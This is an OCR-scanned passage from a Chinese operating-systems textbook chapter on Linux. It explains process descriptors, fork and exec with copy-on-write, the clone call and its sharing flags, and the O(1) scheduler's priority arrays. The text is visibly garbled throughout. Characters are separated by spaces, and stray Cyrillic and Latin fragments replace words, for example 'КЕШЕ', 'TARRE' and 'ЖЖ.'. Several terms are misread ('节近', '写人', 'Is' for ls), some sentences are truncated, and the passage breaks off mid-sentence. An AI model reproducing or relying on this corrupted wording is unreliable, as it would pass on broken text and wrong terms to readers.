别 进程 、 轻 量 级 进程 和 线程 ，Linux 系 统 用 任务 的 数据 结构 来 表示 所 有 的 执行 上 下 文 。 所 以 ， 一 个 单线 
程 的 进程 只 有 一 个 任务 数据 结构 ， 而 一 个 多 线程 的 进程 将 为 每 一 个 用 户 级 线程 分 配 一 个 任务 数据 结构 。 
最 后 ，Linux 的 内 核 是 多 线程 的 ， 并 且 它 所 拥有 的 是 与 任何 用 户 进程 无 关 的 内 核 级 线程 ， 这 些 内 核 级 线 
程 执行 内 核 代码 。 稍 后 ， 本 节 会 重新 关注 多 线程 进程 (一般 的 讲 ， 就 是 线程 ) 的 处 理 方式 。 

对 于 每 一 个 进程 ， 一 个 类 型 为 task_struct 的 进程 描述 符 是 始终 存在 于 内 存 当中 的 。 它 包 含 了 内 核 管 
理 全 部 进程 所 需 的 重要 信息 ， 如 调度 参数 、 已 打开 的 文件 描述 符 列表 等 。 进程 描述 符 从 进程 被 创建 开始 
就 一 直 存 在 于 内 核 堆栈 之 中 。 

为 了 与 其 他 UNIX 系 统 兼 容 ，Linux 还 通过 进程 标识 符 (PID) 来 区 分 进程 。 内 核 将 所 有 进程 的 任务 
数据 结构 组 织 成 一 个 双向 链表 。 不 需要 遍历 这 个 链表 来 访问 进程 描述 符 ， PID 可 以 直接 被 映射 成 进程 的 
任务 数据 结构 所 在 的 地 址 ， 从 而 立即 访问 进程 的 信息 。 

任务 数据 结构 包含 非常 多 的 分 量 。 其 中 一 些 分 量 包含 指向 其 他 数据 结构 或 段 的 指针 ， 比 如 说 包含 关 
于 已 打开 文件 的 信息 。 有 些 段 只 与 进程 用 户 级 的 数据 结构 有 关 ， 当 用 户 进程 没有 运行 的 时 候 ， 它们 是 不 
被 关注 的 。 所 以 ， 当 不 需要 它们 的 时 候 ， 这 些 段 可 以 被 交换 出 去 或 重新 分 页 以 达到 不 浪费 内 存 的 目的 。 
举 个 例子 ， 尽 管 对 于 一 个 进程 来 说 ， 当 它 被 交换 出 去 的 时 候 ， 可 能 会 有 其 他 进程 给 它 发 送信 号 ， 但 是 这 
个 进程 本 身 却 不 会 要 求 读 取 一 个 文件 。 正 因为 如 此 ， 关 于 信号 的 信息 才 必须 永远 保存 在 内 存 里 ， 即 使 这 
个 进程 已 经 不 在 内 存 当中 了 。 换 名 话说 ， 关于 文件 描述 符 的 信息 可 以 被 保存 在 用 户 级 的 数据 结构 里 ， 当 
进程 存在 于 内 存 当 中 并 且 可 以 执行 的 时 候 ， 这 些 信息 才 需 要 被 调和 内存 。 

进程 描述 符 的 信息 包含 以 下 几 大 类 : 

1) 调度 参数 。 进 程 优先 级 ， 节 近 消耗 的 CPU 时 间 ， 最 近 睡 想 的 时 间 。 上 面 几 项 内 容 结合 在 一 起 决定 
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了 下 一 个 要 运行 的 进程 是 哪 一 个 。 

2) 内 存 映射 。 指 向 代码 、 数 据 、 堆 栈 段 或 页 表 的 指针 。 如 果 代 码 段 是 共享 的 ， 代 码 指针 指向 共享 代 
码 表 。 当 进程 不 在 内 存 当 中 时 ， 关 于 如 何在 磁盘 上 找到 这 些 数据 的 信息 也 被 保存 在 这 里 。 

3) 信号 。 掩 码 显示 了 哪些 信号 被 忽略 、 哪 些 信号 需要 捕捉 、 哪 些 信号 被 暂时 阻塞 以 及 哪些 信号 在 传 
КЕШЕ 

4) 机 器 寄存 器 。 当 内 核 陷阱 发 生 时 ， 机 器 寄存 器 的 内 容 (也 包括 被 使 用 了 的 浮 点 寄存 器 的 内 容 ) 会 
被 保存 。 

5) 系统 调用 状态 。 关 于 当前 系统 调用 的 信息 ， 包 括 参数 和 返回 值 。 

6) 文件 描述 符 表 。 当 一 个 与 文件 描述 符 有 关 的 系统 调用 被 调用 的 时 候 ， 文 件 描述 符 作为 索引 在 文件 
描述 符 表 中 定位 相关 文件 的 i 节 点 数据 结构 。 

Т) 统计 。 指 向 记录 用 户 、 进 程 占用 系统 CPU 时 间 的 表 的 指针 。 一 些 系统 还 保存 一 个 进程 最 多 可 以 占 
用 CPU 的 时 间 、 进 程 可 以 拥有 的 最 大 堆栈 空间 、 进 程 可 以 消耗 的 页 面 数 等 。 

8) 内 核 堆栈 。 进 程 的 内 核 部 分 可 以 使 用 的 固定 堆栈 。 

9) 其 他 。 当 前 进程 状态 。 如 果 有 的 话 ， 包 括 正在 等 待 的 事件 、 距 离 警报 时 钟 超时 的 时 间 、PID、 父 
进程 的 PLD 以 及 其 他 用 户 标识 符 、 组 标识 符 等 。 

记 住 这 些 信息 ， 现 在 可 以 很 容易 地 解释 在 Linux 系 统 中 是 如 何 创建 进程 的 。 实 际 上 ， 创 建 一 个 新 进 
程 的 过 程 非常 简单 。 为 子 进 程 创建 一 个 新 的 进程 描述 符 和 用 户 空间 ， 然 后 从 父 进 程 复制 大 量 的 内 容 。 这 
个 子 进程 被 赋予 一 个 PID， 并 建立 它 的 内 存 映射 ， 同 时 它 也 被 赋予 了 访问 属于 父 进 程 文件 的 权利 。 然 后 ， 
它 的 寄存 器 内 容 被 初始 化 并 准备 运行 。 

当 系 统 调用 fork 执 行 的 时 候 ， 调 用 fork 函 数 的 进程 陷入 内 核 并 且 创 建 一 个 任务 数据 结构 和 其 他 相关 
的 数据 结构 ， 如 内 核 堆栈 和 thread_info 结 构 。 这 个 结构 位 于 进程 堆栈 栈 底 固 定 偏 移 量 的 地 方 ， 包 含 一 些 
进程 参数 ， 以 及 进程 描述 符 的 地 址 。 把 进程 描述 符 的 地 址 存储 在 一 个 固定 的 地 方 ， 使 得 Linux 系 统 只 需 
要 进行 很 少 的 有 效 操作 就 可 以 找到 一 个 运行 中 进程 的 任务 数据 结构 。 

进程 描述 符 的 主要 内 容 根据 父 进程 的 进程 描述 符 来 填充 。Linux 系 统 只 需要 寻找 一 个 可 用 的 PID， 更 
新 进程 标识 符 散 列表 的 表 项 使 之 指向 新 的 任务 数据 结构 即 可 。 如 果 散 列表 发 生 冲 突 ， 相同 键 值 的 进程 描 
述 符 会 被 组 成 链表 。 它 会 把 task_struct 结 构 中 的 一 些 分 量 设置 为 指向 任务 数组 中 相应 进程 的 前 一 /后 一 进 
程 的 指针 。 

理论 上 ， 现 在 就 应 该 为 子 进程 分 配 数据 段 、 堆 栈 段 ， 并 且 对 父 进 程 的 段 进行 复制 ， 因 为 fork 函 数 意 
味 着 父 、 子 进程 之 间 不 共享 内 存 。 其 中 如 果 代码 段 是 只 读 的 ， 可 以 复制 也 可 以 共享 。 然 后 ， 子 进程 就 可 
以 运行 了 。 

但 是 ， 复 制 内 存 的 代价 相当 昂贵 ， 所 以 现代 Linux 系 统 都 使 用 了 欺骗 的 手段 。 它 们 赋予 子 进程 属于 
它 的 页 表 ， 但 是 这 些 页 表 都 指向 父 进程 的 页 面 ， 同 时 把 这 些 页 面 标记 成 只 读 。 当 子 进程 试图 向 某 一 页 面 
中 写 人 数据 的 时 候 ， 它 会 收 到 写 保护 的 错误 。 内 核发 现 子 进程 的 写 入 行为 之 后 ， 会 为 子 进程 分 配 一 个 该 
页 面 的 新 副本 ， 并 将 这 个 副本 标记 为 可 读 、 可 写 。 通 过 这 种 方式 ， 使 得 只 有 需要 写 人 数据 的 页 面 才 会 被 
复制 。 这 种 机 制 叫做 写 时 复制 。 它 所 带 来 的 额外 好 处 是 ， 不 需要 在 内 存 中 维护 同一 个 程序 的 两 个 副本 ， 
从 而 节省 了 RAM。 

子 进程 开始 运行 之 后 ， 运 行 代码 (shell 的 副本 ) 调用 系统 调用 exec， 将 命令 名 作为 exec 函 数 的 参 
数 。 内 核 找到 并 核实 相应 的 可 执行 文件 ， 把 参数 和 环境 变量 复制 到 内 核 ， 释 放 旧 的 地 址 空间 和 页 表 。 

现在 必须 建立 并 填充 新 的 地 址 空间 。 如 果 你 使 用 的 系统 像 Linux 系 统 或 其 他 基于 UNIX 的 系统 一 样 支 
持 映 射 文件 ， 新 的 页 表 会 被 创建 ， 并 指出 所 需 的 页 面 不 在 内 存 中 ， 除 非 用 到 的 页 面 是 堆栈 页 ， 但 是 所 需 
的 地 址 空间 在 磁盘 的 可 执行 文件 中 都 有 备份 。 当 新 进程 开始 运行 的 时 候 ， 它 会 立刻 收 到 一 个 缺 页 中 断 ， 
这 会 使 得 第 一 个 含有 代码 的 页 面 从 可 执行 文件 调和 内存 。 通 过 这 种 方式 ， 不 需要 预先 加 载 任何 东西 ， 所 
以 程序 可 以 快速 地 开始 运行 ， 只 有 在 所 需 页 面 不 在 内 存 中 时 才 会 发 生 页 面 错误 (这 种 情况 是 第 3 章 中 讨 
论 的 最 纯粹 的 按 需 分 页 机 制 )。 最 后 ， 参 数 和 环境 变量 被 复制 到 新 的 堆栈 中 ， 信 号 被 重 置 ， 寄存 器 被 全 
部 清 零 。 从 这 里 开始 ， 新 的 命令 就 可 以 运行 了 。 
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图 10-8 通 过 下 面 的 例子 解释 了 上 述 的 步骤 : 某 用 户 在 终端 键入 一 个 命令 ls，shell 调 用 fork 函 数 复制 
自身 以 创建 一 个 新 进程 。 新 的 shell 调 用 exec 函 数 用 可 执行 文件 Is 的 内 容 覆 盖 它 的 内 存 。 


PID = 501 PID = 748 PID = 748 


新 进程 


1.fork 调 用 


分 配子 进程 任务 数据 结构 寻找 可 执行 程序 

从 父 进 程 处 得 到 数据 填写 子 进程 任务 数据 结构 。 ”验证 执行 许可 

分 配子 进程 堆栈 和 用 户 空间 读 取 和 验证 头 文件 

从 父 进程 处 得 到 数据 填写 子 进程 用 户 空间 给 内 核 复制 变量 、 环 境 参数 
为 子 进程 分 配 PID 释放 旧 的 地 址 空间 

设置 子 进程 以 共享 父 进程 的 正文 分 配 新 的 地 址 空间 

为 数据 和 堆栈 复制 页 表 为 堆栈 复制 变量 、 环 境 参数 
设置 共享 打开 文件 信号 复位 

为 子 进程 复制 父 进程 的 寄存 器 初始 化 寄存 器 


图 10-8 shell 执 行 命令 ls 的 步骤 


Linux 中 的 线程 

我 们 在 第 2 章 中 概括 性 的 介绍 了 线程 。 在 这 里 ， 我 们 重点 关注 Linux 系 统 的 内 核 线程 ， 特 别 是 Linux 
系统 中 线程 模型 与 其 他 UNIX 系 统 的 不 同 之 处 。 为 了 能 更 好 地 理解 Linux 模 型 所 提供 的 独一无二 的 性 能 ， 
我 们 先 来 讨论 一 些 多 线程 操作 系统 中 存在 的 有 争议 的 决策 。 

引入 线程 的 最 大 争议 在 于 维护 传统 UNIX 语 义 的 正确 性 。 首 先 来 考虑 fork 函 数 。 假 设 一 个 多 (内核 ) 
线程 的 进程 调用 了 fork 系 统 调用 。 所 有 其 他 的 线程 都 应 该 在 新 进程 中 被 创建 吗 ?我 们 暂时 认为 答案 是 肯 
定 的 。 再 假设 其 他 线程 中 的 其 中 一 个 线程 在 从 键盘 读 取 数 据 时 被 阻塞 。 那 么 ， 新 进程 中 对 应 的 线程 也 应 
该 被 阻塞 么 ?如 果 是 的 话 ， 那 么 哪 一 个 线程 应 该 获得 下 一 行 的 输入 ? 如 果 不 是 的 话 ， 新 进程 中 对 应 的 线 
程 又 应 该 做 什么 呢 ? 同样 的 问题 还 大 量 存在 于 线程 可 以 完成 的 很 多 其 他 的 事情 上 。 在 单线 程 进程 中 ， 由 
于 调用 fork 函 数 的 时 候 ， 惟 一 的 进程 是 不 可 能 被 阻塞 的 ， 所 以 不 存在 这 样 的 问题 。 现 在 ， 考 虑 这 样 的 情 
况 一 一 其 他 的 线程 不 会 在 子 进程 中 被 创建 。 再 假设 一 个 没有 在 子 进程 中 被 创建 的 线程 持 有 一 个 互 斥 变 量 ， 
而 子 进 程 中 惟一 的 线程 在 fork 函 数 结束 之 后 要 获得 这 个 互 斥 变量 。 那 么 由 于 这 个 互 斥 变量 永远 不 会 被 释 
放 ， 所 以 子 进程 中 惟一 的 线程 也 会 永远 挂 起 。 还 有 大 量 其 他 的 问题 存在 。 但 是 没有 简单 的 解决 办 法 。 

文件 输入 /输出 是 另 一 个 问题 。 假 设 一 个 线程 由 于 要 读 取 文 件 而 被 阻塞 ， 而 另 一 个 线程 关闭 了 这 个 
文件 ， 或 者 调用 Iseek 函 数 改变 了 当前 的 文件 指针 。 下 面 会 发 生 什 么 事情 昵 ? 谁 能 知道 ? 

信号 的 处 理 是 另 一 个 坏 手 的 问题 。 信 号 是 应 该 发 送 给 某 一 个 特定 的 线程 还 是 发 送 给 线程 所 在 的 进程 
Ж? 一 个 浮 点 运算 异常 信号 SIGFPE 应 该 被 引起 浮 点 运算 异常 的 线程 所 捕获 。 但 是 如 果 它 没有 捕获 到 
W? 是 应 该 只 杀 死 这 个 线程 ， 还 是 杀 死 线程 所 属 进程 中 的 全 部 线程 ? 再 来 考虑 由 用 户 通过 键盘 输入 的 信 
号 SIGINT。 哪 一 个 线程 应 该 捕获 这 个 信号 ?所 有 的 线程 应 该 共享 同样 的 信号 掩 码 吗 ? 通常 ， 解 决 这 些 
或 其 他 问题 的 所 有 方法 会 引发 另 一 些 问题 。 使 线程 的 语义 正确 (不 涉及 代码 ) 不 是 一 件 容易 的 事 。 

Linux 系 统 用 一 种 非常 值得 关注 的 有 趣 的 方式 支持 内 核 线程 。 具 体 实现 基于 4.4BSD 的 思想 ， 但 是 在 
那个 版 本 中 内 核 线程 没 能 实现 ， 因 为 在 能 够 解决 上 述 问题 的 C 语 言 程序 库 被 重新 编写 之 前 ，Berkeley 就 
资金 短缺 了 。 

从 历史 观点 上 说 ， 进 程 是 资源 容器 ， 而 线程 是 执行 单元 。 一 个 进程 包含 一 个 或 多 个 线程 ， 线 程 之 间 
共享 地 址 空间 、 已 打开 的 文件 、 信 号 处 理 函 数 、 警 报信 号 和 其 他 。 像 上 面 描述 的 一 样 ， 所 有 的 事情 简单 
而 清晰 。 
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2000 年 的 时 候 ，Linux 系 统 引 入 了 一 个 新 的 、 强 大 的 系统 调用 clone， 模 糊 了 进程 和 线程 的 区 别 ， 其 
至 使 得 两 个 概念 的 重要 性 被 倒置 。 任 何其 他 UNIX 系 统 的 版 本 中 都 没有 clone 函 数 。 传 统 观念 上 ， 当 一 个 
新 线程 被 创建 的 时 候 ， 之 前 的 线程 和 新 线程 除了 寄存 器 内 容 之 外 共享 所 有 的 信息 。 特 别 是 ， 已 打开 文件 
的 文件 描述 符 、 信 号 处 理 函 数 、 警 报信 号 和 其 他 每 个 进程 (不 是 每 个 线程 ) 都 具有 的 全 局 属性 。clone 
函数 可 以 设置 这 些 属性 是 进程 特有 的 还 是 线程 特有 的 。 它 的 调用 方式 如 下 : 

pid = clone(function, stack_ptr, sharing_flags, arg); 
调用 这 个 函数 可 以 在 当前 进程 或 新 的 进程 中 创建 一 个 新 线程 ， 具 体 依赖 于 参数 sharing_flags。 如 果 新 线 
程 在 当前 进程 中 ， 它 将 与 其 他 已 存在 的 线程 共享 地 址 空间 ， 任 何 一 个 线程 对 地 址 空间 做 出 修改 对 于 同一 
进程 中 的 其 他 线程 而 言 都 是 立即 可 见 的 。 换 句 话说 ， 如 果 地 址 空间 不 是 共享 的 ， 新 线程 会 获得 地 址 空间 
的 完整 副本 ， 但 是 新 线程 对 这 个 副本 进行 的 修改 对 于 旧 的 线程 来 说 是 不 可 见 的 。 这 些 语义 同 POSIX 的 
fork 函 数 是 相同 的 。 

在 这 两 种 情况 下 ， 新 线程 都 从 function 处 开始 执行 ， 并 以 arg 作 为 惟一 的 参数 。 同 时 ， 新 线程 还 拥有 
私有 堆栈 ， 其 中 私有 堆栈 的 指针 被 初始 化 为 stack_ptr。 

参数 sharing_flags 是 一 个 位 图 ， 这 个 位 图 允许 比 传统 的 UNIX 系 统 更 加 细 粒 度 的 共享 。 每 一 位 可 以 单 
独 设置 ， 且 每 一 位 决定 了 新 线程 是 复制 一 些 数据 结构 还 是 与 调用 clone 函 数 的 线程 共享 这 些 数据 结构 。 
图 10-9 显 示 了 根据 sharing_flags 的 设置 ， 哪 些 项 可 以 共享 ， 哪 些 项 需要 复制 。 

CLONE_VM 位 决定 了 虚拟 内 存 〈 即 地 址 空间 ) 是 与 旧 的 线程 共享 还 是 需要 复制 。 如 果 该 位 置 !， 新 线 
程 加 入 到 已 存在 的 线程 中 去 ， 即 clone 函 数 在 一 个 已 经 存在 的 进程 中 创建 了 一 个 新 线程 。 如 果 该 位 清 零 ， 
新 线程 会 拥有 私有 的 地 址 空间 。 拥 有 自己 的 地 址 空间 意味 着 存储 的 操作 对 于 之 前 已 经 存在 的 线程 而 言 是 不 
可 见 的 。 这 与 fork 函 数 很 相似 ， 除 了 下 面 提 到 的 一 点 。 创 建新 的 地 址 空间 事实 上 就 定义 了 一 个 新 的 进程 。 


标志 置 位 时 的 含义 清除 时 的 含义 
CLONE_VM 创建 一 个 新 线程 创建 一 个 新 进程 
CLONE_FS 共享 umask、 根 目录 和 工作 目录 不 共享 
CLONE_FILES 共享 文件 描述 符 复制 文件 描述 符 
CLONE_SIGHAND 共享 信号 句柄 表 复制 该 表 
CLONE_PID 新 线程 获得 旧 的 PID 新 线程 获得 自己 的 PID 
CLONE_PARENT 新 线程 与 调用 者 有 相同 的 父亲 新 线程 的 父亲 是 调用 者 


图 10-9 sharing-flags 位 图 中 的 各 个 位 


CLONE_FS 位 控制 着 是 否 共 享 根 目录 、 当 前 工作 目录 和 umask 标 志 。 即 使 新 线程 拥有 自己 的 地 址 空 

间 ， 如 果 该 位 置 1， 新 、 旧 线程 之 间 也 可 以 共享 当前 工作 目录 。 这 就 意味 着 即使 一 个 线程 拥有 自己 的 地 

空间 ， 另 一 个 线程 也 可 以 调用 chdir 函 数 改 变 它 的 工作 目录 。 在 UNIX 系 统 中 ， 一 个 线程 通常 会 调用 
chdir 函 数 改变 它 所 在 进程 中 其 他 线程 的 当前 工作 目录 ， 而 不 会 对 另 一 进程 中 的 线程 做 这 样 的 操作 。 所 以 
说 ， 这 一 位 引入 了 一 种 传统 UNIX 系 统 不 可 能 具有 的 共享 性 。 

CLONE_FILES 位 与 CLONE_FS 位 相似 。 如 果 该 位 置 1， 新 线程 与 昌 线 程 共享 文件 描述 符 ， 所 以 一 
个 线程 调用 lseek 函 数 对 另 一 个 线程 而 言 是 可 见 的 。 通 常 ， 这 样 的 处 理 是 对 于 同属 一 个 进程 的 线程 ， 而 
不 是 不 同 进程 的 线程 。 相 似 的 ，CLONE_SIGHAND 位 控制 是 否 在 新 、 旧 线程 间 共享 信号 句柄 表 。 如 果 
信号 处 理 函 数 表 是 共享 的 ， 即 使 是 在 拥有 不 同 地 址 空间 的 线程 之 间 共享 ， 一 个 线程 改变 某 一 处 理 函 数 也 
会 影响 另 一 个 线程 的 处 理 函 数 。CLONE_PID 位 控制 新 线程 是 拥有 自己 的 PID 还 是 与 父 进程 共享 PID。 这 
个 特性 在 系统 启动 的 时 候 是 必需 的 。 用 户 进程 不 允许 对 该 位 进行 设置 。 

最 后 ， 每 一 个 进程 都 有 一 个 父 进程 。CLONE_PARENT 位 控制 着 哪 一 个 线程 是 新 线程 的 父 线程 。 父 
线程 可 以 与 clone 函 数 调用 者 的 父 线 程 相同 (在 这 种 情况 下 ， 新 线程 是 clone 函 数 调用 者 的 兄弟 )， 也 可 
以 是 clone 函 数 调用 者 本 身 ， 在 这 种 情况 下 ， 新 线程 是 clone 函 数 调用 者 的 子 线程 。 还 有 另外 一 些 控制 其 
他 项 目的 位 ， 但 是 它们 不 是 很 重要 。 

由 于 Linux 系 统 为 不 同 的 项 目 维护 了 独立 的 数据 结构 ( 见 10.3.3 小 节 ， 如 调度 参数 、 内 存 映 射 等 ) ， 
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因此 细 粒 度 的 共享 成 为 了 可 能 。 任 务 数据 结构 只 需要 指向 这 些 数据 结构 即 可 ， 所 以 为 每 一 个 线程 创建 一 
个 新 的 任务 数据 结构 变 得 很 容易 ， 或 者 使 它 指向 旧 线程 的 调度 参数 、 内 存 映射 和 其 他 的 数据 结构 ， 或 者 
复制 它们 。 事 实 上 ， 条 理 分 明 的 共享 性 虽然 成 为 了 可 能 ， 但 并 不 意味 着 它 是 有 益 的 ， 毕 竞 传统 的 UNIX 
系统 都 没有 提供 这 样 的 功能 。 一 个 利用 了 这 种 共享 性 的 Linux 程 序 将 不 能 移植 到 UNIX 系 统 上 。 

Linux 系 统 的 线程 模型 带 来 了 另 一 个 难题 。UNIX 系 统 为 每 一 个 进程 分 配 一 个 独立 的 PID， 不 论 它 是 
单线 程 的 进程 还 是 多 线程 的 进程 。 为 了 能 与 其 他 的 UNIX 系 统 兼容 ，Linux 对 进程 标识 符 (PID) 和 任务 
标识 符 (TID) 进行 了 区 分 。 这 两 个 分 量 都 存储 在 任务 数据 结构 中 。 当 调用 clone 函 数 创建 一 个 新 进程 而 
不 需要 和 有 旧 进 程 共享 任何 信息 时 ，PID 被 设置 成 一 个 新 值 ， 否 则 ， 任 务 得 到 一 个 新 的 任务 标识 符 ， 但 是 
PID 不 变 。 这 样 一 来 ， 一 个 进程 中 所 有 的 线程 都 会 拥有 与 该 进程 中 第 一 个 线程 相同 的 PID。 


10.3.4 ”Linux 中 的 调度 

现在 我 们 来 关注 Linux 系 统 的 调度 算法 。 首 先 要 认识 到 ，Linux 系 统 的 线程 是 内 核 线程 ， 所 以 Linux 
系统 的 调度 是 基于 线程 的 ， 而 不 是 基于 进程 的 。 

为 了 进行 调度 ，Linux 系 统 将 线程 区 分 为 三 类 : 

D 实时 先入 先 出 。 

2) 实时 轮转 。 

3) 分 时 。 

实时 先 人 先 出 线程 具有 最 高 优先 级 ， 它 不 会 被 其 他 线程 抢占 ， 除 非 那 是 一 个 刚刚 准备 好 的 、 拥有 更 
高 优先 级 的 实时 先 人 先 出 线程 。 实 时 轮转 线程 与 实时 先 人 先 出 线程 基本 相同 ， 只 是 每 个 实时 轮转 线程 都 
有 一 个 时 间 量 ， 时 间 到 了 之 后 就 可 以 被 抢占 。 如 果 多 个 实时 轮转 线程 都 准备 好 了 ， 每 一 个 线程 运行 它 的 
时 间 量 所 规定 的 时 间 ， 然 后 插入 到 实时 轮转 线程 列表 的 未 尾 。 事 实 上 ， 这 两 类 线程 都 不 是 真正 的 实时 线 
程 。 执 行 的 最 后 期 限 无 法 确定 ， 更 无 法 保证 最 后 期 限 前 线程 可 以 执行 完毕 。 这 两 类 线程 比 起 分 时 线程 来 
说 只 是 具有 更 高 的 优先 级 而 已 。Linux 系 统 之 所 以 称 它们 为 “实时 " 是 因为 Linux 系 统 遵循 的 P1003.4 标 
准 (UNIX 系 统 对 “实时 ”含义 的 扩展 ) 使 用 了 这 个 名 称 。 在 系统 内 部 ， 实时 线程 的 优先 级 从 0 到 99，0 
是 实时 线程 的 最 高 优先 级 ，99 是 实时 线程 的 最 低 优先 级 。 

传统 的 非 实时 线程 按照 如 下 的 算法 进行 调度 。 在 系统 内 部 ， 非 实时 线程 的 优先 级 从 100 到 139， 也 就 
是 说 ， 在 系统 内 部 ，Linux 系 统 区 分 140 级 的 优先 级 (包括 实时 和 非 实 时 任务 )。 就 像 实 时 轮转 线程 一 样 ， 
Linux 系 统 根据 非 实 时 线程 的 优先 级 分 配 时 间 量 。 这 个 时 间 量 是 线程 可 以 连续 运行 的 时 钟 周 期 数 。 在 当 
前 的 Linux 版 本 中 ， 时 钟 频率 为 1000 赫 兹 ， 每 个 时 钟 周期 为 Ims， 也 叫做 一 个 最 小 时 间 间隔 (jiffy)。 

像 大 多 数 UNIX 系 统一 样 ，Linux 系 统 给 每 个 线程 分 配 一 个 nice 值 ( 即 优先 级 调节 值 ) 。 默认 值 是 0， 
但 是 可 以 通过 调用 系统 调用 nice (value) 来 修改 ， 修 改 值 的 范围 从 -20 到 +19。 这 个 值 决定 了 线程 的 静 
ЖЖ. 一 个 在 后 台大 量 计算 x 值 的 用 户 可 以 在 他 的 程序 里 调用 这 个 系统 调用 为 其 他 用 户 让 出 更 多 计 
算 资源 。 只 有 系统 管理 员 可 以 要 求 比 普通 服务 更 好 的 服务 (意味 着 nice 函 数 参数 值 的 范围 从 -20 到 -1) 。 
推断 这 条 规则 的 理由 作为 练习 留 给 读者 。 

Linux 调 度 算法 使 用 一 个 重要 的 数据 结构 一 调度 队列 。 在 系统 中 ， 一 个 CPU 有 -个 调度 队列 ， 除 
了 其 他 信息 ， 调 度 队列 中 有 两 个 数组 ， 一 个 是 正在 活动 的 ， 一 个 是 过 期 失效 的 。 如 图 10-10 所 示 ， 这 两 
个 分 量 都 是 指向 数组 的 指针 ， 每 个 数组 都 包含 了 140 个 链表 头 ， 每 个 链表 具有 不 同 的 优先 级 。 链 表 头 指 
向 给 定 优先 级 的 双向 进程 链表 。 调 度 的 基本 操作 如 下 所 述 。 

调度 器 从 正在 活动 数组 中 选择 一 个 优先 级 最 高 的 任务 。 如 果 这 个 任务 的 时 间 片 (时 间 量 ) 过 期 失效 
了 ， 就 把 它 移动 到 过 期 失效 数组 中 〈 可 能 会 插入 到 优先 级 不 同 的 列表 中 )。 如 果 这 个 任务 阻塞 了 ， 比 如 
说 正在 等 待 JO 事 件 ， 那 么 在 它 的 时 间 片 过 期 失效 之 前 ， 一 旦 所 等 待 的 事件 发 生 ， 任 务 就 可 以 继续 运行 ， 
它 将 被 放 回 到 之 前 正在 活动 的 数组 中 ， 时 间 片 根据 它 所 消耗 的 CPU 时 间 相应 的 碱 少 。 一 旦 它 的 时 间 片 消 
耗 到 尽 ， 它 也 会 被 放 到 过 期 失效 数组 中 。 当 正在 活动 数组 中 没有 其 他 的 任务 了 ， 调 度 器 交换 指针 ， 使 得 
正在 活动 数组 变 为 过 期 失效 数组 ， 过 期 失效 数组 变 为 正在 活动 数组 。 这 种 方法 可 以 保证 低 优先 级 的 任务 
TARRE (除非 实时 先入 先 出 线程 完全 占用 CPU， 但 是 这 种 情况 是 不 会 发 生 的 ) 。 

不 同 的 优先 级 被 赋予 不 同 的 时 间 片 长 度 。 Linux 系 统 会 赋予 高 优先 级 的 进程 较 长 的 时 间 片 。 例 如 ， 
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优先 级 为 100 的 任务 可 以 得 到 800ms 的 时 间 片 ， 而 优先 级 为 139 的 任务 只 能 得 到 5ms 的 时 间 片 。 
每 个 CPU 上 的 调度 队列 


图 10-10 Linux 调 度 队列 和 优先 级 数组 


这 种 调度 模式 的 思想 是 为 了 使 进程 更 快 地 出 和 内核。 如果 一 个 进程 试图 读 取 一 个 磁盘 文件 ， 在 调用 
read 抑 数 之 间 等 待 一 秒 钟 的 时 间 显然 会 极 大 地 降低 进程 的 效率 。 每 个 请 求 完成 之 后 让 进程 立即 运行 的 做 
法 会 好 得 多 ， 同 时 这 样 做 也 可 以 使 下 一 个 请 求 更 快 的 完成 。 相 似 地 ， 如 果 一 个 进程 因为 等 待 键盘 输入 而 
阻塞 ， 那 么 它 明 显 是 一 个 交互 进程 ， 这 样 的 进程 只 要 准备 好 运行 后 就 应 当 被 赋予 较 高 的 优先 级 ， 从 而 保 
证 交互 进程 可 以 提供 较 好 的 服务 。 在 这 种 情况 下 ， 当 IO 密集 进程 和 交互 进程 被 阻塞 之 后 ，CPU 密 集 进 
程 基本 上 可 以 得 到 所 有 被 留 下 的 服务 。 

由 于 Linux 系 统 《或 其 他 任何 操作 系统 ) 事先 不 知道 一 个 任务 究竟 是 1O 密 集 的 ， 还 是 CPU 密集 的 ， 
它 只 是 依赖 于 连续 保持 的 互动 启发 模式 。 通 过 这 种 方式 ，Linux 系 统 区 分 静态 优先 级 和 动态 优先 级 。 线 
程 的 动态 优先 级 不 断 地 被 重新 计算 ， 其 目的 在 于 : (1) 奖励 互动 进程 ，(2) 惩罚 占用 CPU 的 进程 。 最 高 的 
优先 级 奖励 是 -5， 是 从 调度 器 接收 的 与 更 高 优先 级 相对 应 的 较 低 优先 级 的 值 。 最 高 的 优先 级 惩罚 是 +5。 

说 得 更 详细 些 ， 调 度 器 给 每 一 个 任务 维护 一 个 名 为 sleep_avg 的 变量 。 每 当 任务 被 唤醒 时 ， 这 个 变量 
会 增加 ， 当 任务 被 抢占 或 时 间 量 过 期 时 ， 这 个 变量 会 相应 地 减少 。 减 少 的 值 用 来 动态 生成 优先 级 奖励 ， 
奖励 的 范围 从 -5 到 +5。 当 一 个 线程 从 正在 活动 数组 移动 到 过 期 失效 数组 中 时 ，Linux 系 统 的 调度 器 会 重 
新 计算 它 的 优先 级 。 

这 里 讲述 的 调度 算法 指 的 是 2.6 版 本 内 核 ， 最 初 引入 这 个 调度 算法 的 是 不 稳定 的 2.5 版 本 内 核 。 早 期 
的 调度 算法 在 多 处 理 器 环境 中 所 表现 的 性 能 十 分 低下 ， 并 且 当 任务 的 数量 大 量 增长 时 ， 不 能 很 好 地 进行 
调度 。 由 于 上 面 描述 的 内 容 说 明了 通过 访问 正在 活动 数组 就 可 以 做 出 调度 决定 ， 那 么 调度 可 以 在 一 个 固 
定 的 时 间 O (1) 内 完成 ， 而 与 系统 中 进程 的 数量 无 关 。 

另外 ， 调 度 器 包含 了 对 于 多 处 理 器 和 多 核 平台 而 言 非常 有 益 的 特性 。 首 先 ， 在 多 处 理 器 平台 上 ， 运 
行 队列 数据 结构 与 某 一 个 处 理 器 相对 应 ， 调 度 器 尽量 进行 亲 和 调 度 ， 即 将 之 前 在 某 个 处 理 器 上 运行 过 的 
任务 再 次 调 入 该 处 理 器 。 第 二 ， 为 了 更 好 地 描述 或 修改 一 个 选 定 的 线程 对 亲 和 性 的 要 求 ， 有 一 组 系统 调 
用 可 供 调用 。 最 后 ， 在 满足 特定 性 能 和 亲 和 要 求 的 前 提 下 ， 调 度 器 实现 在 不 同 处 理 器 上 阶段 性 地 加 载 平 
衡 ， 从 而 保证 整个 系统 的 加 载 是 平衡 的 。 

调度 器 只 考虑 可 以 运行 的 任务 ， 这 些 任务 被 放 在 适当 的 调度 队列 当中 。 不 可 运行 的 任务 和 正在 等 待 
